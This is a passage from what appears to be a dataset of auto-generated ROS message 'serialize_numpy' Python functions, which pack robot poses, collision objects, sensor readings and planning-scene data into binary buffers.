buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_f.pack(_v76.padding))\n _v79 = _v76.operation\n buff.write(_struct_b.pack(_v79.operation))\n length = len(_v76.shapes)\n buff.write(_struct_I.pack(length))\n for val3 in _v76.shapes:\n buff.write(_struct_b.pack(val3.type))\n length = len(val3.dimensions)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(val3.dimensions.tostring())\n length = len(val3.triangles)\n buff.write(_struct_I.pack(length))\n pattern = '<%si'%length\n buff.write(val3.triangles.tostring())\n length = len(val3.vertices)\n buff.write(_struct_I.pack(length))\n for val4 in val3.vertices:\n _x = val4\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n length = len(_v76.poses)\n buff.write(_struct_I.pack(length))\n for val3 in _v76.poses:\n _v80 = val3.position\n _x = _v80\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v81 = val3.orientation\n _x = _v81\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(val1.touch_links)\n buff.write(_struct_I.pack(length))\n for val2 in val1.touch_links:\n length = len(val2)\n if python3 or type(val2) == unicode:\n val2 = val2.encode('utf-8')\n length = len(val2)\n buff.write(struct.pack('<I%ss'%length, length, val2))\n _x = self\n buff.write(_struct_3I.pack(_x.planning_scene_diff.collision_map.header.seq, _x.planning_scene_diff.collision_map.header.stamp.secs, _x.planning_scene_diff.collision_map.header.stamp.nsecs))\n _x = self.planning_scene_diff.collision_map.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.planning_scene_diff.collision_map.boxes)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene_diff.collision_map.boxes:\n _v82 = val1.center\n _x = _v82\n buff.write(_struct_3f.pack(_x.x, _x.y, _x.z))\n _v83 = val1.extents\n _x = _v83\n buff.write(_struct_3f.pack(_x.x, _x.y, _x.z))\n _v84 = val1.axis\n _x = _v84\n buff.write(_struct_3f.pack(_x.x, _x.y, _x.z))\n buff.write(_struct_f.pack(val1.angle))\n length = len(self.operations.collision_operations)\n buff.write(_struct_I.pack(length))\n for val1 in self.operations.collision_operations:\n _x = val1.object1\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.object2\n length = len(_x)\n if python3 or 
type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1\n buff.write(_struct_di.pack(_x.penetration_distance, _x.operation))\n except struct.error as se: self._check_types(se)\n except TypeError as te: self._check_types(te)", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_struct_3I.pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_51B.pack(_x.temp_1_curr, _x.temp_1_min, _x.temp_1_max, _x.temp_2_curr, _x.temp_2_min, _x.temp_2_max, _x.temp_3_curr, _x.temp_3_min, _x.temp_3_max, _x.temp_4_curr, _x.temp_4_min, _x.temp_4_max, _x.temp_5_curr, _x.temp_5_min, _x.temp_5_max, _x.temp_6_curr, _x.temp_6_min, _x.temp_6_max, _x.akku_voltage_curr, _x.akku_voltage_min, _x.akku_voltage_max, _x.hals_motor_voltage_curr, _x.hals_motor_voltage_min, _x.hals_motor_voltage_max, _x.hals_logik_voltage_curr, _x.hals_logik_voltage_min, _x.hals_logik_voltage_max, _x.tablett_logik_voltage_curr, _x.tablett_logik_voltage_min, _x.tablett_logik_voltage_max, _x.arm_logik_voltage_curr, _x.arm_logik_voltage_min, _x.arm_logik_voltage_max, _x.tablett_motor_voltage_curr, _x.tablett_motor_voltage_min, _x.tablett_motor_voltage_max, _x.hals_motor_current_curr, _x.hals_motor_current_min, _x.hals_motor_current_max, _x.hals_logik_current_curr, _x.hals_logik_current_min, _x.hals_logik_current_max, _x.tablett_logik_current_curr, _x.tablett_logik_current_min, _x.tablett_logik_current_max, _x.arm_logik_current_curr, _x.arm_logik_current_min, _x.arm_logik_current_max, _x.tablett_motor_current_curr, _x.tablett_motor_current_min, _x.tablett_motor_current_max))\n except struct.error, se: self._check_types(se)\n except TypeError, te: self._check_types(te)", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self.sim_step\n buff.write(_get_struct_I().pack(_x))\n _x = self.type.data\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self.parent_name.data\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self.name.data\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self\n buff.write(_get_struct_2f7dI().pack(_x.wall_time, _x.sim_time, _x.pose.position.x, _x.pose.position.y, _x.pose.position.z, _x.pose.orientation.x, _x.pose.orientation.y, _x.pose.orientation.z, _x.pose.orientation.w, _x.count))\n length = len(self.triggered)\n buff.write(_struct_I.pack(length))\n pattern = '<%sB'%length\n buff.write(self.triggered.tostring())\n length = len(self.range)\n buff.write(_struct_I.pack(length))\n pattern = '<%sf'%length\n buff.write(self.range.tostring())\n length = len(self.measurement)\n buff.write(_struct_I.pack(length))\n pattern = '<%sf'%length\n buff.write(self.measurement.tostring())\n length = len(self.sensed_objects)\n 
buff.write(_struct_I.pack(length))\n for val1 in self.sensed_objects:\n _x = val1.data\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self.sensed_objects_map\n length = len(_x)\n # - if encoded as a list instead, serialize as bytes instead of string\n if type(_x) in [list, tuple]:\n buff.write(struct.Struct('<I%sB'%length).pack(length, *_x))\n else:\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n buff.write(_struct_f.pack(self.yaw))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_struct_3I.pack(_x.model.header.seq, _x.model.header.stamp.secs, _x.model.header.stamp.nsecs))\n _x = self.model.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_i.pack(self.model.id))\n _x = self.model.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.model.params)\n buff.write(_struct_I.pack(length))\n for val1 in self.model.params:\n _x = val1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1\n buff.write(_struct_dB.pack(_x.value, _x.type))\n _x = self\n buff.write(_struct_3I.pack(_x.model.track.header.seq, _x.model.track.header.stamp.secs, _x.model.track.header.stamp.nsecs))\n _x = self.model.track.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_i.pack(self.model.track.id))\n length = len(self.model.track.pose)\n buff.write(_struct_I.pack(length))\n for val1 in self.model.track.pose:\n _v29 = val1.position\n _x = _v29\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v30 = val1.orientation\n _x = _v30\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.model.track.pose_headers)\n buff.write(_struct_I.pack(length))\n for val1 in self.model.track.pose_headers:\n buff.write(_struct_I.pack(val1.seq))\n _v31 = val1.stamp\n _x = _v31\n buff.write(_struct_2I.pack(_x.secs, _x.nsecs))\n _x = val1.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.model.track.pose_projected)\n buff.write(_struct_I.pack(length))\n for val1 in self.model.track.pose_projected:\n _v32 = val1.position\n _x = _v32\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v33 = val1.orientation\n _x = _v33\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = 
len(self.model.track.pose_resampled)\n buff.write(_struct_I.pack(length))\n for val1 in self.model.track.pose_resampled:\n _v34 = val1.position\n _x = _v34\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v35 = val1.orientation\n _x = _v35\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.model.track.pose_flags)\n buff.write(_struct_I.pack(length))\n pattern = '<%sI'%length\n buff.write(self.model.track.pose_flags.tostring())\n length = len(self.model.track.channels)\n buff.write(_struct_I.pack(length))\n for val1 in self.model.track.channels:\n _x = val1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val1.values)\n buff.write(_struct_I.pack(length))\n pattern = '<%sf'%length\n buff.write(val1.values.tostring())\n _x = self\n buff.write(_struct_3I.pack(_x.data.header.seq, _x.data.header.stamp.secs, _x.data.header.stamp.nsecs))\n _x = self.data.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_i.pack(self.data.id))\n _x = self.data.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.data.params)\n buff.write(_struct_I.pack(length))\n for val1 in self.data.params:\n _x = val1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1\n buff.write(_struct_dB.pack(_x.value, _x.type))\n _x = self\n buff.write(_struct_3I.pack(_x.data.track.header.seq, _x.data.track.header.stamp.secs, _x.data.track.header.stamp.nsecs))\n _x = self.data.track.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_i.pack(self.data.track.id))\n length = len(self.data.track.pose)\n buff.write(_struct_I.pack(length))\n for val1 in self.data.track.pose:\n _v36 = val1.position\n _x = _v36\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v37 = val1.orientation\n _x = _v37\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.data.track.pose_headers)\n buff.write(_struct_I.pack(length))\n for val1 in self.data.track.pose_headers:\n buff.write(_struct_I.pack(val1.seq))\n _v38 = val1.stamp\n _x = _v38\n buff.write(_struct_2I.pack(_x.secs, _x.nsecs))\n _x = val1.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.data.track.pose_projected)\n buff.write(_struct_I.pack(length))\n for val1 in self.data.track.pose_projected:\n _v39 = val1.position\n _x = _v39\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v40 = val1.orientation\n _x = _v40\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.data.track.pose_resampled)\n buff.write(_struct_I.pack(length))\n for val1 in self.data.track.pose_resampled:\n _v41 = val1.position\n _x = _v41\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v42 = val1.orientation\n _x = _v42\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.data.track.pose_flags)\n buff.write(_struct_I.pack(length))\n pattern = '<%sI'%length\n 
buff.write(self.data.track.pose_flags.tostring())\n length = len(self.data.track.channels)\n buff.write(_struct_I.pack(length))\n for val1 in self.data.track.channels:\n _x = val1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val1.values)\n buff.write(_struct_I.pack(length))\n pattern = '<%sf'%length\n buff.write(val1.values.tostring())\n except struct.error as se: self._check_types(se)\n except TypeError as te: self._check_types(te)", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.sensor_FL.header.seq, _x.sensor_FL.header.stamp.secs, _x.sensor_FL.header.stamp.nsecs))\n _x = self.sensor_FL.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_B4f3I().pack(_x.sensor_FL.radiation_type, _x.sensor_FL.field_of_view, _x.sensor_FL.min_range, _x.sensor_FL.max_range, _x.sensor_FL.range, _x.sensor_FR.header.seq, _x.sensor_FR.header.stamp.secs, _x.sensor_FR.header.stamp.nsecs))\n _x = self.sensor_FR.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_B4f3I().pack(_x.sensor_FR.radiation_type, _x.sensor_FR.field_of_view, _x.sensor_FR.min_range, _x.sensor_FR.max_range, _x.sensor_FR.range, _x.sensor_RR.header.seq, _x.sensor_RR.header.stamp.secs, _x.sensor_RR.header.stamp.nsecs))\n _x = self.sensor_RR.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_B4f3I().pack(_x.sensor_RR.radiation_type, _x.sensor_RR.field_of_view, _x.sensor_RR.min_range, _x.sensor_RR.max_range, _x.sensor_RR.range, _x.sensor_RL.header.seq, _x.sensor_RL.header.stamp.secs, _x.sensor_RL.header.stamp.nsecs))\n _x = self.sensor_RL.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_B4f().pack(_x.sensor_RL.radiation_type, _x.sensor_RL.field_of_view, _x.sensor_RL.min_range, _x.sensor_RL.max_range, _x.sensor_RL.range))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_struct_3I.pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_3I.pack(_x.pan.header.seq, _x.pan.header.stamp.secs, _x.pan.header.stamp.nsecs))\n _x = self.pan.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n 
buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_6f3df3I.pack(_x.pan.current, _x.pan.pos_rad, _x.pan.vel_rps, _x.pan.torque_nm, _x.pan.pwm, _x.pan.encoder_rad, _x.pan.accel.x, _x.pan.accel.y, _x.pan.accel.z, _x.pan.temperature_degC, _x.tilt.header.seq, _x.tilt.header.stamp.secs, _x.tilt.header.stamp.nsecs))\n _x = self.tilt.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_6f3df.pack(_x.tilt.current, _x.tilt.pos_rad, _x.tilt.vel_rps, _x.tilt.torque_nm, _x.tilt.pwm, _x.tilt.encoder_rad, _x.tilt.accel.x, _x.tilt.accel.y, _x.tilt.accel.z, _x.tilt.temperature_degC))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_struct_3I.pack(_x.planning_scene.robot_state.joint_state.header.seq, _x.planning_scene.robot_state.joint_state.header.stamp.secs, _x.planning_scene.robot_state.joint_state.header.stamp.nsecs))\n _x = self.planning_scene.robot_state.joint_state.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.planning_scene.robot_state.joint_state.name)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene.robot_state.joint_state.name:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n buff.write(struct.pack('<I%ss'%length, length, val1))\n length = len(self.planning_scene.robot_state.joint_state.position)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.planning_scene.robot_state.joint_state.position.tostring())\n length = len(self.planning_scene.robot_state.joint_state.velocity)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.planning_scene.robot_state.joint_state.velocity.tostring())\n length = len(self.planning_scene.robot_state.joint_state.effort)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.planning_scene.robot_state.joint_state.effort.tostring())\n _x = self\n buff.write(_struct_2I.pack(_x.planning_scene.robot_state.multi_dof_joint_state.stamp.secs, _x.planning_scene.robot_state.multi_dof_joint_state.stamp.nsecs))\n length = len(self.planning_scene.robot_state.multi_dof_joint_state.joint_names)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene.robot_state.multi_dof_joint_state.joint_names:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n buff.write(struct.pack('<I%ss'%length, length, val1))\n length = len(self.planning_scene.robot_state.multi_dof_joint_state.frame_ids)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene.robot_state.multi_dof_joint_state.frame_ids:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n buff.write(struct.pack('<I%ss'%length, length, val1))\n length = 
len(self.planning_scene.robot_state.multi_dof_joint_state.child_frame_ids)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene.robot_state.multi_dof_joint_state.child_frame_ids:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n buff.write(struct.pack('<I%ss'%length, length, val1))\n length = len(self.planning_scene.robot_state.multi_dof_joint_state.poses)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene.robot_state.multi_dof_joint_state.poses:\n _v169 = val1.position\n _x = _v169\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v170 = val1.orientation\n _x = _v170\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.planning_scene.fixed_frame_transforms)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene.fixed_frame_transforms:\n _v171 = val1.header\n buff.write(_struct_I.pack(_v171.seq))\n _v172 = _v171.stamp\n _x = _v172\n buff.write(_struct_2I.pack(_x.secs, _x.nsecs))\n _x = _v171.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.child_frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v173 = val1.transform\n _v174 = _v173.translation\n _x = _v174\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v175 = _v173.rotation\n _x = _v175\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.planning_scene.allowed_collision_matrix.link_names)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene.allowed_collision_matrix.link_names:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n buff.write(struct.pack('<I%ss'%length, length, val1))\n length = len(self.planning_scene.allowed_collision_matrix.entries)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene.allowed_collision_matrix.entries:\n length = len(val1.enabled)\n buff.write(_struct_I.pack(length))\n pattern = '<%sB'%length\n buff.write(val1.enabled.tostring())\n length = len(self.planning_scene.allowed_contacts)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene.allowed_contacts:\n _x = val1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v176 = val1.shape\n buff.write(_struct_b.pack(_v176.type))\n length = len(_v176.dimensions)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(_v176.dimensions.tostring())\n length = len(_v176.triangles)\n buff.write(_struct_I.pack(length))\n pattern = '<%si'%length\n buff.write(_v176.triangles.tostring())\n length = len(_v176.vertices)\n buff.write(_struct_I.pack(length))\n for val3 in _v176.vertices:\n _x = val3\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v177 = val1.pose_stamped\n _v178 = _v177.header\n buff.write(_struct_I.pack(_v178.seq))\n _v179 = _v178.stamp\n _x = _v179\n buff.write(_struct_2I.pack(_x.secs, _x.nsecs))\n _x = _v178.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v180 = _v177.pose\n _v181 = _v180.position\n _x = _v181\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v182 = _v180.orientation\n _x = 
_v182\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(val1.link_names)\n buff.write(_struct_I.pack(length))\n for val2 in val1.link_names:\n length = len(val2)\n if python3 or type(val2) == unicode:\n val2 = val2.encode('utf-8')\n length = len(val2)\n buff.write(struct.pack('<I%ss'%length, length, val2))\n buff.write(_struct_d.pack(val1.penetration_depth))\n length = len(self.planning_scene.link_padding)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene.link_padding:\n _x = val1.link_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_d.pack(val1.padding))\n length = len(self.planning_scene.collision_objects)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene.collision_objects:\n _v183 = val1.header\n buff.write(_struct_I.pack(_v183.seq))\n _v184 = _v183.stamp\n _x = _v184\n buff.write(_struct_2I.pack(_x.secs, _x.nsecs))\n _x = _v183.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_f.pack(val1.padding))\n _v185 = val1.operation\n buff.write(_struct_b.pack(_v185.operation))\n length = len(val1.shapes)\n buff.write(_struct_I.pack(length))\n for val2 in val1.shapes:\n buff.write(_struct_b.pack(val2.type))\n length = len(val2.dimensions)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(val2.dimensions.tostring())\n length = len(val2.triangles)\n buff.write(_struct_I.pack(length))\n pattern = '<%si'%length\n buff.write(val2.triangles.tostring())\n length = len(val2.vertices)\n buff.write(_struct_I.pack(length))\n for val3 in val2.vertices:\n _x = val3\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n length = len(val1.poses)\n buff.write(_struct_I.pack(length))\n for val2 in val1.poses:\n _v186 = val2.position\n _x = _v186\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v187 = val2.orientation\n _x = _v187\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.planning_scene.attached_collision_objects)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene.attached_collision_objects:\n _x = val1.link_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v188 = val1.object\n _v189 = _v188.header\n buff.write(_struct_I.pack(_v189.seq))\n _v190 = _v189.stamp\n _x = _v190\n buff.write(_struct_2I.pack(_x.secs, _x.nsecs))\n _x = _v189.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v188.id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_f.pack(_v188.padding))\n _v191 = _v188.operation\n buff.write(_struct_b.pack(_v191.operation))\n length = len(_v188.shapes)\n buff.write(_struct_I.pack(length))\n for val3 in _v188.shapes:\n buff.write(_struct_b.pack(val3.type))\n length = len(val3.dimensions)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n 
buff.write(val3.dimensions.tostring())\n length = len(val3.triangles)\n buff.write(_struct_I.pack(length))\n pattern = '<%si'%length\n buff.write(val3.triangles.tostring())\n length = len(val3.vertices)\n buff.write(_struct_I.pack(length))\n for val4 in val3.vertices:\n _x = val4\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n length = len(_v188.poses)\n buff.write(_struct_I.pack(length))\n for val3 in _v188.poses:\n _v192 = val3.position\n _x = _v192\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v193 = val3.orientation\n _x = _v193\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(val1.touch_links)\n buff.write(_struct_I.pack(length))\n for val2 in val1.touch_links:\n length = len(val2)\n if python3 or type(val2) == unicode:\n val2 = val2.encode('utf-8')\n length = len(val2)\n buff.write(struct.pack('<I%ss'%length, length, val2))\n _x = self\n buff.write(_struct_3I.pack(_x.planning_scene.collision_map.header.seq, _x.planning_scene.collision_map.header.stamp.secs, _x.planning_scene.collision_map.header.stamp.nsecs))\n _x = self.planning_scene.collision_map.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.planning_scene.collision_map.boxes)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene.collision_map.boxes:\n _v194 = val1.center\n _x = _v194\n buff.write(_struct_3f.pack(_x.x, _x.y, _x.z))\n _v195 = val1.extents\n _x = _v195\n buff.write(_struct_3f.pack(_x.x, _x.y, _x.z))\n _v196 = val1.axis\n _x = _v196\n buff.write(_struct_3f.pack(_x.x, _x.y, _x.z))\n buff.write(_struct_f.pack(val1.angle))\n except struct.error as se: self._check_types(se)\n except TypeError as te: self._check_types(te)", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_struct_3I.pack(_x.model_aligned.header.seq, _x.model_aligned.header.stamp.secs, _x.model_aligned.header.stamp.nsecs))\n _x = self.model_aligned.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_i.pack(self.model_aligned.id))\n _x = self.model_aligned.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.model_aligned.params)\n buff.write(_struct_I.pack(length))\n for val1 